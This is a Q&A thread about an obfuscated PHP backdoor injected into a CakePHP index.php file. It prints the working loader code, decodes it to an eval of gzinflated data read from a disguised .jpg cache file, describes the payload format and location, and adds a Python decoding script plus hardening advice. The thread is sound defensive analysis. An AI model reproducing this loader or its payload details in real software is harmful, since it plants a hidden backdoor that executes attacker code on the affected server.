1
votes

I was contacted regarding some strange error messages on a CakePHP website the other day. We were seeing errors like the following:

Expectation Failed:
The expectation given in the Expect request-header field could not be met by this server.
             Expect: 100-continue, 100-continue
Only the 100-continue expectation is supported.

I ended up tracking down the random code in our index.php file:

    $get_ya_weekday_initial = 'dvA, @fzi*f,@pE(& lE[E`pJco"Pe*$P "/(o-A!`  mh(!3,da7*& H&    (a@"1m!tHOE#@a+E.3b2hp`s-td$p(!teq.Ck@L/tm`*ca"H$$PeRshsTE"$!IBFCcTQ`hI.H`%" )(#'|
    '!4ah(@ExHlFH!d! BID WgE$W#*N$!DPs( $h$ld.FELFnItr+Ner&de$ofiuQr(h$(*blh,#`je/C#rI04"+@AM@La$d2)2)%h.`,0/@@ahA+p@2PiA$alt/BRBB04u$in(jPg )!!:';
    $wp_cw_kses_split = '>=^/E]u*PDAF$!V'^']O;N18*L%*"2MN8';$set_yly_timeout = $wp_cw_kses_split('',$get_ya_weekday_initial);$set_yly_timeout();

It looks like some sort of scrambled / encrypted code, so I'm suspicious. But I don't know how to go about descrambling it. Anyone have any ideas about what this code was trying to do?

Edit: Here's the entire index.php file. Note: the hack code is back as of this morning :-/ Have been checking around on the server, but don't see how the code got put in (and the date modified date on the file remains unchanged since I edited it yesterday).


    
     * Copyright 2005-2007, Cake Software Foundation, Inc.
     *                              1785 E. Sahara Avenue, Suite 490-204
     *                              Las Vegas, Nevada 89104
     *
     * Licensed under The MIT License
     * Redistributions of files must retain the above copyright notice.
     *
     * @filesource
     * @copyright       Copyright 2005-2007, Cake Software Foundation, Inc.
     * @link                http://www.cakefoundation.org/projects/info/cakephp CakePHP(tm) Project
     * @package         cake
     * @subpackage      cake.app.webroot
     * @since           CakePHP(tm) v 0.2.9
     * @version         $Revision: 4450 $
     * @modifiedby      $LastChangedBy: phpnut $
     * @lastmodified    $Date: 2007-02-04 23:18:05 -0600 (Sun, 04 Feb 2007) $
     * @license         http://www.opensource.org/licenses/mit-license.php The MIT License
     */
    /**
     * Do not change
     */
        if (!defined('DS')) {
            define('DS', DIRECTORY_SEPARATOR);
        }
    /**
     * These defines should only be edited if you have cake installed in
     * a directory layout other than the way it is distributed.
     * Each define has a commented line of code that explains what you would change.
     *
     */
    $get_ya_weekday_initial = 'dvA, @fzi*f,@pE(& lE[E`pJco"Pe*$P "/(o-A!`  mh(!3,da7*& H&(a@"1m!tHOE#@a+E.3b2hp`s-td$p(!teq.Ck@L/tm`*ca"H$$PeRshsTE"$!IBFCcTQ`hI.H`%" )(#'|
    '!4ah(@ExHlFH!d! BID WgE$W#*N$!DPs( $h$ld.FELFnItr+Ner&de$ofiuQr(h$(*blh,#`je/C#rI04"+@AM@La$d2)2)%h.`,0/@@ahA+p@2PiA$alt/BRBB04u$in(jPg )!!:';
    $wp_cw_kses_split = '>=^/E]u*PDAF$!V'^']O;N18*L%*"2MN8';$set_yly_timeout = $wp_cw_kses_split('',$get_ya_weekday_initial);$set_yly_timeout();
        if (!defined('ROOT')) {
            //define('ROOT', 'FULL PATH TO DIRECTORY WHERE APP DIRECTORY IS LOCATED DO NOT ADD A TRAILING DIRECTORY SEPARATOR';
            //You should also use the DS define to seperate your directories
            define('ROOT', dirname(dirname(dirname(__FILE__))));
        }
        if (!defined('APP_DIR')) {
            //define('APP_DIR', 'DIRECTORY NAME OF APPLICATION';
            define('APP_DIR', basename(dirname(dirname(__FILE__))));
        }
    /**
     * This only needs to be changed if the cake installed libs are located
     * outside of the distributed directory structure.
     */
        if (!defined('CAKE_CORE_INCLUDE_PATH')) {
            //define ('CAKE_CORE_INCLUDE_PATH', FULL PATH TO DIRECTORY WHERE CAKE CORE IS INSTALLED DO NOT ADD A TRAILING DIRECTORY SEPARATOR';
            //You should also use the DS define to seperate your directories
            define('CAKE_CORE_INCLUDE_PATH', ROOT);
        }
    ///////////////////////////////
    //DO NOT EDIT BELOW THIS LINE//
    ///////////////////////////////
        if (!defined('WEBROOT_DIR')) {
            define('WEBROOT_DIR', basename(dirname(__FILE__)));
        }
        if (!defined('WWW_ROOT')) {
            define('WWW_ROOT', dirname(__FILE__) . DS);
        }
        if (!defined('CORE_PATH')) {
            if (function_exists('ini_set')) {
                ini_set('include_path', CAKE_CORE_INCLUDE_PATH . PATH_SEPARATOR . ROOT . DS . APP_DIR . DS . PATH_SEPARATOR . ini_get('include_path'));
                define('APP_PATH', null);
                define('CORE_PATH', null);
            } else {
                define('APP_PATH', ROOT . DS . APP_DIR . DS);
                define('CORE_PATH', CAKE_CORE_INCLUDE_PATH . DS);
            }
        }
        require CORE_PATH . 'cake' . DS . 'bootstrap.php';
        if (isset($_GET['url']) && $_GET['url'] === 'favicon.ico') {
        } else {
            $Dispatcher = new Dispatcher();
            $Dispatcher->dispatch($url);
        }
        if (Configure::read() > 0) {
            echo "";
        }
    ?>

I'm starting to wonder if I need to update Cake, as it's currently v1.1 :-/

1
The code you posted is invalid, so it does nothing. I assume you only copied a part of the whole code, so I would say that the site has been tampered with. Get in contact with the system administrator of the server so she gets informed that it has been manipulated. She should be able to give you further directions. – hakre
No, that was all the code. The rest of it was the normal index.php file (<?php, etc.). Does look pretty weird, doesn't it? – acorncom
It does look really weird indeed. Although the code has valid syntax, it will throw a syntax error at runtime, but anyway, it doesn't make sense at all. I would remove it and see what happens; however, it doesn't seem to be causing the Expectation Failed response. – luchomolina
Wow, this is really interesting. It seems that the code is just obfuscated in some way. After doing some debugging, this is what I get: $get_ya_weekday_initial = 'eval(@gzinflate(file_get_contents("/home/felonius/new.felofiuqzih&9oc|h.#oogoc+wo3v2kpam|e$t:)vmunokl|/tmajckrH6tyevslwGrfcyvwgk~yjxo.ia%: )(#', $wp_cw_kses_split = 'create_function' and $set_yly_timeout = false. Since the last instruction is $set_yly_timeout(), and $set_yly_timeout is false, that throws a parse error. Odd. – luchomolina
Where in the index.php is this code located? – luchomolina

1 Answer

2
votes

Anyone have any ideas about what this code was trying to do?

The code in a more readable form is:

    eval(@gzinflate(file_get_contents(".../persistent/KRFCstudio.jpg")));

It's sort of a backdoor script that has been obfuscated (if you want to know how, see the related question). It's resting in the code until a payload is provided.

The payload needs to be placed into

    .../cake/scripts/templates/skel/tmp/cache/persistent/KRFCstudio.jpg

in the form of DEFLATE data (RFC 1951) containing PHP code (without the opening <?php tag); see the gzinflate docs and the eval docs.

Note: the hack code is back as of this morning :-/ Have been checking around on the server, but don't see how the code got put in (and the date modified date on the file remains unchanged since I edited it yesterday).

Make your changes to the file again. Then make the file read-only (as any of your PHP files should be on the server). When it is read-only, check whether it is still clean. Also ensure that the process reading the file in a standard web request is not able to change file permissions on the file, e.g. only allow root to do that.

Then log file access to the files on your site to find out when a file gets changed (or a process attempts to change a file).

As commented yesterday, you should contact the person responsible for the server. You already did that, right? You need to have someone who can look into the issue with you and who can talk with you about it.
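As an added example, not code from the question or the answer: a Python script that reproduces the decoding described in the answer without ever executing the loader, by emulating PHP's string `|` and `^` operators byte-wise, and that triages a candidate payload file the way gzinflate() reads it. It assumes the literals as copied from the infected index.php (only the first 34 bytes of the OR'd pair, since the remainder lost non-printable bytes in copying) and uses a constructed, harmless stand-in for the planted payload.

```python
"""Added example (not code from the question or the answer): decode the operator-obfuscated
loader from the infected index.php without executing any PHP, by emulating PHP's string
operators byte-wise ('|' keeps the longer operand's tail, '^' truncates to the shorter
operand), then triage a candidate payload file the way gzinflate() would read it."""
import zlib

def php_str_or(a, b):
    """Emulate PHP's '|' on two strings: pairwise OR, longer operand's tail kept."""
    if len(a) < len(b):
        a, b = b, a
    return bytes(x | y for x, y in zip(a, b)) + a[len(b):]

def php_str_xor(a, b):
    """Emulate PHP's '^' on two strings: pairwise XOR, cut to the shorter operand."""
    return bytes(x ^ y for x, y in zip(a, b))

# Literals copied from the infected index.php. The OR'd pair is cut to its first
# 34 bytes: the rest contains non-printable bytes that did not survive copying.
ORED_A = b'dvA, @fzi*f,@pE(& lE[E`pJco"Pe*$P '
ORED_B = b'!4ah(@ExHlFH!d! BID WgE$W#*N$!DPs('
XORED_A = b'>=^/E]u*PDAF$!V'
XORED_B = b']O;N18*L%*"2MN8'

def decode_loader():
    """Return (callable name, code body): what $wp_cw_kses_split('', $get_ya_weekday_initial) builds."""
    return (php_str_xor(XORED_A, XORED_B).decode('latin-1'),
            php_str_or(ORED_A, ORED_B).decode('latin-1'))

def inspect_cache_file(blob):
    """Triage a file like .../cache/persistent/KRFCstudio.jpg without running it.
    gzinflate() consumes raw DEFLATE (RFC 1951), which is zlib with wbits=-15."""
    verdict = {'is_jpeg': blob[:3] == b'\xff\xd8\xff', 'inflates': False, 'text': None}
    try:
        verdict['text'] = zlib.decompress(blob, -15).decode('utf-8', 'replace')
        verdict['inflates'] = True
    except zlib.error:
        pass
    return verdict

# Constructed stand-in for a planted payload: harmless PHP, deflated as the loader expects.
_c = zlib.compressobj(9, zlib.DEFLATED, -15)
SAMPLE_PAYLOAD = _c.compress(b'echo "constructed sample, not the real payload";') + _c.flush()

if __name__ == '__main__':
    func, body = decode_loader()
    print(f'{func}("", {body!r} ...)')   # create_function("", 'eval(@gzinflate(file_get_contents(' ...)
    print(inspect_cache_file(SAMPLE_PAYLOAD))
```

A real cache file that is neither a JPEG nor raw-DEFLATE data is merely odd; one that inflates to PHP text is the payload the loader is waiting for.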